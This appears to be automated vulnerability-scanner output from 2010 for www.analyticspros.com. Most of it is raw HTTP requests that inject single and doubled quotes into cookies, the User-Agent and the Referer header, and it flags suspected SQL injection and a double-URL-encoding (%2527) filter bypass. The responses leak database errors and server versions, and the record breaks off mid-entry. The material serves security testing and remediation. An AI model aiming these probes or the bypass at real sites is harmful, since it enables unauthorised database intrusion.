GET /products/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11'; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:33:26 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /products/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11''; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:33:27 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:33:31 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 07:33:31 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 23235
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The apros2.0_tpl cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the apros2.0_tpl cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /products/63-urchin.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/products/63-urchin/119-urchin-6.html?itemid=70#comment Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0'; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:35:35 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /products/63-urchin.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/products/63-urchin/119-urchin-6.html?itemid=70#comment Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0''; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:35:35 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the __utmc cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /products/63-urchin/119-urchin-6.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141%2527; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:46:39 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Wed, 26-Oct-2011 23:46:47 GMT; path=/ Last-Modified: Fri, 05 Nov 2010 23:46:48 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22914
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
< ...[SNIP]... <span style="line-height: 24px;">Processing error diagnostics and resolution</span> ...[SNIP]...
Request 2
GET /products/63-urchin/119-urchin-6.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141%2527%2527; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:46:50 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /products/63-urchin/120-buy-urchin-7-or-upgrade.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)' Connection: close Referer: http://www.analyticspros.com/products.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:54:31 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /products/63-urchin/120-buy-urchin-7-or-upgrade.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)'' Connection: close Referer: http://www.analyticspros.com/products.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:54:32 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:54:34 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 07:54:34 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 30628
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The d4dad6935f632ac35975e3001dc7bbe8 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the d4dad6935f632ac35975e3001dc7bbe8 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the d4dad6935f632ac35975e3001dc7bbe8 cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /products/63-urchin/120-buy-urchin-7-or-upgrade.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb%2527; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:34:21 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /products/63-urchin/120-buy-urchin-7-or-upgrade.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb%2527%2527; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:34:22 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:34:26 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 07:34:26 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 30535
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The ki_t cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_t cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /products/63-urchin/120-buy-urchin-7-or-upgrade.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/products.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11'; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:42:18 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /products/63-urchin/120-buy-urchin-7-or-upgrade.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/products.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11''; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:42:22 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:42:26 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 07:42:26 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 30622
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The optimizelyEndUserId cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the optimizelyEndUserId cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /products/63-urchin/120-buy-urchin-7-or-upgrade.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/products.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169';
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:52:16 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /products/63-urchin/120-buy-urchin-7-or-upgrade.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/products.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169'';
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:52:17 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:52:18 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 07:52:18 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 30627
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /products/63-urchin/70-urchin.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c; Referer: http://www.google.com/search?hl=en&q=%2527
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:59:13 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /products/63-urchin/70-urchin.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c; Referer: http://www.google.com/search?hl=en&q=%2527%2527
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:59:14 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:59:18 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 07:59:18 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 25158
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The __utma cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utma cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /products/63-urchin/70-urchin.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/products.html?start=4 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1'; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:50:48 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
